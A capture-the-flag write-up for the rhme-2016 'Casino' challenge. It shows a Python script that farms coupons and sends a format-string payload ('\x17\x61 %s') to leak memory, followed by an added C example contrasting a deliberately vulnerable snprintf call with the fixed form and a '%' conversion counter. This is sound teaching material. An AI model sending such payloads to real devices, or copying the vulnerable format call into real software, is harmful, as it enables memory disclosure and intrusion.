rhme-2016 write-up Casino

Casino (Exploit - 150 pts)

:> Format string exploit

First you need free coupons, which you get by playing the Spin game [1].
Note: you have to repeat this a lot...

Then select the drink menu.
You'll be asked to select a drink; this menu is only available with free coupons.
The input is printed back (if you enter aaa, aaa is displayed).
I tried %s %s and got a memory dump!!

Then we tried many addresses and... Kabooooom ("\x17\x61 %s" as input works well)
Note: 0x6117 is for the fun (0x900 max)

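from rhme_serial import *  # serial helper used by this write-up (not shown on this page)

s = rhme_serial()
tickets = 0
# Play the Spin game until the reply reports a free coupon.
while not tickets:
    trash = s.xfer("4\n")
    trash = s.xfer("1\n")
    trash = s.xfer("S\n")
    trash = s.xfer("\r\n")
    # The first digit after "left: " must be non-zero.
    if int(trash.split("left: ")[1][0]):
        tickets = 1
# Select the drink menu, then send the bytes of 0x6117 (little-endian) followed by %s.
trash = s.xfer("3\n")
print(s.xfer("\x17\x61 %s\n"))
s.close()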
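
The drink prompt described above (plain text is echoed back, while %s produces a memory dump) is the behaviour of user input being used as the printf format argument. The following C code is an added example, not code from this write-up or from the challenge firmware: it puts that call beside the fixed one and adds a check for conversion specifiers in input. All function names are hypothetical, and on a host the vulnerable call is only exercised with the harmless input "100%%".

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for the drink echo: the user's bytes are passed as
 * the FORMAT argument, so "%s", "%x", ... are interpreted, not printed. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security" /* compilers flag this call */
int echo_drink_vulnerable(char *out, size_t n, const char *input) {
    return snprintf(out, n, input);
}
#pragma GCC diagnostic pop

/* Fixed form: constant format string, the user's bytes are only ever data. */
int echo_drink_safe(char *out, size_t n, const char *input) {
    return snprintf(out, n, "%s", input);
}

/* Count '%' conversions in input; "%%" is a literal percent sign and is not
 * counted. A non-zero result on a plain-text field is worth logging. */
int count_conversions(const char *input) {
    int count = 0;
    for (const char *p = input; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        count++; /* a lone or trailing '%' is counted too */
    }
    return count;
}

int main(void) {
    char buf[64];
    const char *payload = "\x17\x61 %s"; /* input quoted in the write-up */

    /* "%%" takes no argument, so it is safe to show the difference with it. */
    echo_drink_vulnerable(buf, sizeof buf, "100%%");
    printf("vulnerable echo of 100%%%%: %s\n", buf);   /* format was parsed */
    echo_drink_safe(buf, sizeof buf, "100%%");
    printf("safe echo of 100%%%%:       %s\n", buf);   /* printed verbatim */

    /* The write-up's input passes through the fixed call as 5 inert bytes. */
    int len = echo_drink_safe(buf, sizeof buf, payload);
    printf("safe echo length: %d, conversions in input: %d\n",
           len, count_conversions(payload));
    return 0;
}
```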